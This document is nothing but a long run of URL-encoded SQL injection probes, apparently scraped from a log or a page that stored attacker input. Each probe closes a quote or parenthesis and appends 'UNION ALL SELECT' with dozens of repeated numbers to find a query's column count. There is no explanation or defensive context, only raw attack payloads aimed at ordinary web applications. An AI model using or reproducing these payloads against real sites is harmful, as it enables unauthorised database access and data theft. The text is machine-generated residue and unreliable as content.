-5571%22%29%29%29%20UNION%20ALL%20SELECT%204033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%2C4033%23 -6114%22%29%29%29%20UNION%20ALL%20SELECT%207877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%2C7877%23 -8587%22%29%29%29%20UNION%20ALL%20SELECT%202987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%2C2987%23 -4349%22%29%29%29%20UNION%20ALL%20SELECT%209100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%2C9100%23 -9872%22%20UNION%20ALL%20SELECT%209665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%2C9665%23 -2590%22%20UNION%20ALL%20SELECT%206520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%23 -9105%22%20UNION%20ALL%20SELECT%206384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%2C6384%23 -7545%22%20UNION%20ALL%20SELECT%205497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%2C5497%23 -9735%22%20UNION%20ALL%20SELECT%207556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%2C7556%23 -8311%22%20UNION%20ALL%20SELECT%204108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%2C4108%23 -7971%22%20UNION%20ALL%20SELECT%206120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%2C6120%23 -7402%22%20UNION%20ALL%20SELECT%206381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%2C6381%23 -4146%22%20UNION%20ALL%20SELECT%204558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%2C4558%23 -3599%22%20UNION%20ALL%20SELECT%201328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%2C1328%23 -3330%22%29%20UNION%20ALL%20SELECT%207806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%2C7806%23 -7112%22%29%20UNION%20ALL%20SELECT%203979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%2C3979%23 -5097%22%29%20UNION%20ALL%20SELECT%206454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%2C6454%23 -6487%22%29%20UNION%20ALL%20SELECT%202815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%2C2815%23 -9373%22%29%20UNION%20ALL%20SELECT%208421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%2C8421%23 -8557%22%29%20UNION%20ALL%20SELECT%202330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%23 -9042%22%29%20UNION%20ALL%20SELECT%201945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%2C1945%23 -2340%22%29%20UNION%20ALL%20SELECT%208645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%2C8645%23 -7848%22%29%20UNION%20ALL%20SELECT%206169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%23 -7666%22%29%20UNION%20ALL%20SELECT%204347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%2C4347%23 -7929%22%29%29%20UNION%20ALL%20SELECT%205695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%2C5695%23 -3158%22%29%29%20UNION%20ALL%20SELECT%205661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%2C5661%23 -2569%22%29%29%20UNION%20ALL%20SELECT%202988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%23 -1716%22%29%29%20UNION%20ALL%20SELECT%201069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%2C1069%23 -9837%22%29%29%20UNION%20ALL%20SELECT%209038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%2C9038%23 -8705%22%29%29%20UNION%20ALL%20SELECT%206265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%2C6265%23 -4528%22%29%29%20UNION%20ALL%20SELECT%206630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%2C6630%23 -2039%22%29%29%20UNION%20ALL%20SELECT%206530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%2C6530%23 -2819%22%29%29%20UNION%20ALL%20SELECT%204249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%2C4249%23 -1424%22%29%29%20UNION%20ALL%20SELECT%201697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%2C1697%23 -4186%22%29%29%29%20UNION%20ALL%20SELECT%208590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%23 -3621%22%29%29%29%20UNION%20ALL%20SELECT%201133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%2C1133%23 -5233%22%29%29%29%20UNION%20ALL%20SELECT%209688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%2C9688%23 -3693%22%29%29%29%20UNION%20ALL%20SELECT%205020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%2C5020%23 -8683%22%29%29%29%20UNION%20ALL%20SELECT%207136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%2C7136%23 -8509%22%29%29%29%20UNION%20ALL%20SELECT%207679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%2C7679%23 -3456%22%29%29%29%20UNION%20ALL%20SELECT%208967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%2C8967%23 -3871%22%29%29%29%20UNION%20ALL%20SELECT%203591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%23 -3613%22%29%29%29%20UNION%20ALL%20SELECT%209876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%23 -1155%22%29%29%29%20UNION%20ALL%20SELECT%205879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%2C5879%23 -4689%22%20UNION%20ALL%20SELECT%202763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%2C2763%23 -4886%22%20UNION%20ALL%20SELECT%204858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%2C4858%23 -7189%22%20UNION%20ALL%20SELECT%206632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%2C6632%23 -7757%22%20UNION%20ALL%20SELECT%202578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%2C2578%23 -9593%22%20UNION%20ALL%20SELECT%202330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%2C2330%23 -3541%22%20UNION%20ALL%20SELECT%203861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%2C3861%23 -3778%22%20UNION%20ALL%20SELECT%209709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%2C9709%23 -4959%22%20UNION%20ALL%20SELECT%205220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%2C5220%23 -3549%22%20UNION%20ALL%20SELECT%204573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%23 -7582%22%20UNION%20ALL%20SELECT%207724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%23 -6382%25%27%29%20UNION%20ALL%20SELECT%209993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%2C9993%23 -9111%25%27%29%20UNION%20ALL%20SELECT%209102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%2C9102%23 -5015%25%27%29%20UNION%20ALL%20SELECT%209732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%2C9732%23 -8285%25%27%29%20UNION%20ALL%20SELECT%205395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%2C5395%23 -5762%25%27%29%20UNION%20ALL%20SELECT%207268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%2C7268%23 -6180%25%27%29%20UNION%20ALL%20SELECT%208180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%23 -3025%25%27%29%20UNION%20ALL%20SELECT%208121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%2C8121%23 -4440%25%27%29%20UNION%20ALL%20SELECT%204937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%2C4937%23 -2241%25%27%29%20UNION%20ALL%20SELECT%203553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%2C3553%23 -4468%25%27%29%20UNION%20ALL%20SELECT%209508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%2C9508%23 -8573%25%27%29%29%20UNION%20ALL%20SELECT%204785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%23 -4135%25%27%29%29%20UNION%20ALL%20SELECT%202065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%2C2065%23 -9434%25%27%29%29%20UNION%20ALL%20SELECT%208970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%2C8970%23 -8476%25%27%29%29%20UNION%20ALL%20SELECT%208796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%2C8796%23 -5711%25%27%29%29%20UNION%20ALL%20SELECT%203397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%2C3397%23 -3298%25%27%29%29%20UNION%20ALL%20SELECT%203812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%2C3812%23 -4610%25%27%29%29%20UNION%20ALL%20SELECT%206604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%2C6604%23 -4628%25%27%29%29%20UNION%20ALL%20SELECT%209670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%2C9670%23 -1165%25%27%29%29%20UNION%20ALL%20SELECT%203365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%2C3365%23 